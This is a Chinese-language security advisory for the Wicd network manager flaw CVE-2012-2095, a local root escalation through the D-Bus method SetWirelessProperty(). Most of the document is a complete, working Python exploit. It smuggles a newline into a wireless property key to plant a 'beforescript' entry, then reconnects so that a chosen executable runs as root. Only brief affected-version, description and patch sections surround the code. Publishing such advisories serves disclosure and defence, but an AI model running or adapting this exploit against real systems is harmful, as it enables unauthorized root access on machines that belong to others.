Wicd 'SetWirelessProperty()' 本地权限提升漏洞

Wicd 'SetWirelessProperty()' 本地权限提升漏洞

发布日期：2012-04-11
更新日期：2012-04-25

受影响系统：
Wicd Wicd 1.7.1~b3-4
Wicd Wicd 1.7.1~b3-3
Wicd Wicd 1.5.9
Wicd Wicd 1.5.8
描述：
--------------------------------------------------------------------------------
BUGTRAQ  ID: 52987
CVE ID: CVE-2012-2095

Wicd是Linux平台下的开源有线和无线网络管理器。

Wicd在'SetWirelessProperty()'函数的输入验证上存在本地权限提升漏洞，可访问DBUS接口的本地攻击者，可利用超级用户权限利用此漏洞执行任意代码。

<*来源：anonymous
  *>

测试方法：
--------------------------------------------------------------------------------

警 告

以下程序(方法)可能带有攻击性，仅供安全研究与教学之用。使用者风险自负！

anonymous （）提供了如下测试方法：

#!/usr/bin/python
#wicd 0day exploit discovered on 4.9.12 by InfoSec Institute student
#For full write up and description go to http://www.infosecinstitute.com/courses/ethical_hacking_training.html
import sys
import os
import time
import getopt

try: from wicd import dbusmanager
except: print "[!] WICD Error: libraries are not available. Is WICD installed?"; sys.exit(0)

class Error(Exception):
    def __init__(self, error):
        self.errorStr=error
   
    def __str__(self):
        return repr(self.errorStr)
   

class Wicd():
    wireless=None
    daemon=None
    versionString=None
    def __init__(self):
        try:
            dbusmanager.connect_to_dbus()
            dbusInterfaces    = dbusmanager.get_dbus_ifaces()
            self.wireless        = dbusInterfaces["wireless"]
            self.daemon        = dbusInterfaces["daemon"]
        except:
            raise Error("Daemon is not running")
        self.versionString = self.daemon.Hello()
   
    def versionLessThan(self, version):
        if int(self.versionString.replace(".",""))<=version:
            return True
        else:
            return False
   

class Exploit():
   
    def __init__(self, wicd, scriptPath):
        self.wicd = wicd
        self.scriptPath = scriptPath
   
    def getNets(self):
        self.wicd.wireless.Scan(True)
        nets = self.wicd.wireless.GetNumberOfNetworks()
        while nets < 1:
            self.wicd.wireless.Scan(True)
            nets = self.wicd.wireless.GetNumberOfNetworks()
        for net in range(nets):
            yield net
   
    def exploit(self):
       
        for net in self.getNets(): pass # Priming scan.
       
        try:
            self.wicd.wireless.SetWirelessProperty(0, "beforescript = "+ self.scriptPath +"\nrooted", "true")
        except:
            raise Error("Unable to exploit (SetWirelessProperty() failed.)")
       
        try:
            self.wicd.wireless.SaveWirelessNetworkProperty(0, "beforescript = "+ self.scriptPath +"\nrooted")
        except:
            raise Error("Unable to exploit (SetWirelessProperty() failed.)")
       
        propertyKey    = 'bssid' # Could be essid, or any other identifiable wireless property
        vulnIdentifier    = self.wicd.wireless.GetWirelessProperty(0, propertyKey)
       
        # TODO: Does this need a try construct?
        self.wicd.wireless.ReloadConfig()
       
        for net in self.getNets(): # Implicit, but required re-scan.
            if self.wicd.wireless.GetWirelessProperty(net, propertyKey) == vulnIdentifier:
                self.wicd.wireless.ConnectWireless(net)
                return True
        raise Error("Unable to exploit (Lost the network we were using)")
   

def usage():
    print "[!] Usage:"
    print "    ( -h, --help ):"
    print "        Print this message."
    print "    ( --scriptPath= ): Required, executable to run as root."
    print "        --scriptPath=/some/path/to/executable.sh"

def main():
    print "[$] WICD =< 1.7.0Day"
    try:
        opts, args = getopt.getopt(sys.argv[1:], "h", ["help", "scriptPath="])
    except getopt.GetoptError, err:
        # Print help information and exit:
        print '[!] Parameter error:' + str(err) # Will print something like "option -a not recognized"
        usage()
        sys.exit(0)
   
    scriptPath=None
   
    for opt, arg in opts:
        if opt in ("-h", "--help"):
            usage()
            sys.exit(0)
        elif opt =="--scriptPath":
            scriptPath=arg
        else:
            # I would be assuming to say we'll never get here.
            print "[!] Parameter error."
            usage()
            sys.exit(0)
   
    if not scriptPath:
        print "[!] Parameter error: scriptPath not set."
        usage()
        sys.exit(0)
   
    try:
        wicd = Wicd()
    except Error as error:
        print "[!] WICD Error: %s" % (error.errorStr)
        exit(0)
    print "[*] WICD Connection Initialized! (Version: %s)" % (wicd.versionString)
   
    if not wicd.versionLessThan(171):
        print "[!] WICD Warning: version print exceeds 1.7.1: Trying anyhow."
   
    exploit = Exploit(wicd, scriptPath)
   
    print "[*] Attempting to exploit:"
   
    try:
        exploit.exploit()
    except Error as error:
        print "[!] Exploit Error: %s" % (error.errorStr)
        exit(0)
    print "[*] Exploit appears to have worked."

# Standard boilerplate to call the main() function to begin
# the program.
if __name__=='__main__':
    main()

建议：
--------------------------------------------------------------------------------
厂商补丁：

Wicd
----
目前厂商已经发布了升级补丁以修复这个安全问题，请到厂商的主页下载：

http://wicd.net/